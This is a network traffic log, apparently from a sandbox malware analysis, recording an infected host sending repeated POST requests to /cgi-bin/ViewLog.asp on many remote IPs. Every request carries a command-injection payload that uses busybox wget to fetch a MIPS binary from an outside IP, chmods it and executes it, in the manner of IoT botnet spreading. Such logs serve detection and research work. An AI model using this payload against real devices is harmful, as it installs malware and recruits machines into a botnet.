                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.28 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource (/cgi-bin/ViewLog.asp) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.28</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              254192.168.2.134160094.122.235.648080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:17.509246111 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              255192.168.2.134112031.136.115.1968080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:17.693085909 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:20.774549007 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:26.918521881 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:38.950535059 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:04.550405979 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.702238083 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              256192.168.2.133856831.136.183.2228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:17.861532927 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:18.438500881 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:19.558767080 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:21.798506975 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:26.406467915 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:35.366492033 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:54.310472965 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:31.174323082 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              257192.168.2.133608031.136.254.1748080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:17.863760948 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:18.438488007 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:19.590495110 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:22.054471970 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:26.662509918 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:35.878484964 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:54.310417891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:31.174328089 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              258192.168.2.133525685.214.49.1378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:17.881105900 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:18.096307039 CET1340INHTTP/1.1 403
                                              Vary: Origin
                                              Vary: Access-Control-Request-Method
                                              Vary: Access-Control-Request-Headers
                                              Set-Cookie: XSRF-TOKEN=babb0e07-6cde-4d11-89d4-fe44d13faf63; Path=/
                                              Content-Disposition: inline;filename=f.txt
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: 0
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Security-Policy: default-src 'self'; frame-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://storage.googleapis.com; style-src 'self' https://fonts.googleapis.com 'unsafe-inline'; img-src 'self' data:; font-src 'self' https://fonts.gstatic.com data:
                                              Referrer-Policy: strict-origin-when-cross-origin
                                              Permissions-Policy: camera=(), fullscreen=(self), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), sync-xhr=()
                                              Content-Type: application/problem+json
                                              Transfer-Encoding: chunked
                                              Date: Thu, 23 Nov 2023 04:16:17 GMT
                                              Keep-Alive: timeout=20
                                              Connection: keep-alive
                                              Data Raw: 66 36 0d 0a 7b 22 74 79 70 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 68 69 70 73 74 65 72 2e 74 65 63 68 2f 70 72 6f 62 6c 65 6d 2f 70 72 6f 62 6c 65 6d 2d 77 69 74 68 2d 6d 65 73 73 61 67 65 22 2c 22 74 69 74 6c 65 22 3a 22 46 6f 72 62 69 64 64 65 6e 22 2c 22 73 74 61 74 75 73 22 3a 34 30 33 2c 22 64 65 74 61 69 6c 22 3a 22 43 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 65 20 70 72 6f 76 69 64 65 64 20 43 53 52 46 20 74 6f 6b 65 6e 20 62 65 63 61 75 73 65 20 6e 6f 20 74 6f 6b 65 6e 20 77 61 73 20 66 6f 75 6e 64 20 74 6f 20 63 6f 6d 70 61 72 65 2e 22 2c 22 70 61 74 68 22 3a 22 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 65
                                              Data Ascii: f6{"type":"https://www.jhipster.tech/problem/problem-with-message","title":"Forbidden","status":403,"detail":"Could not verify the provided CSRF token because no token was found to compare.","path":"/cgi-bin/ViewLog.asp","message":"e


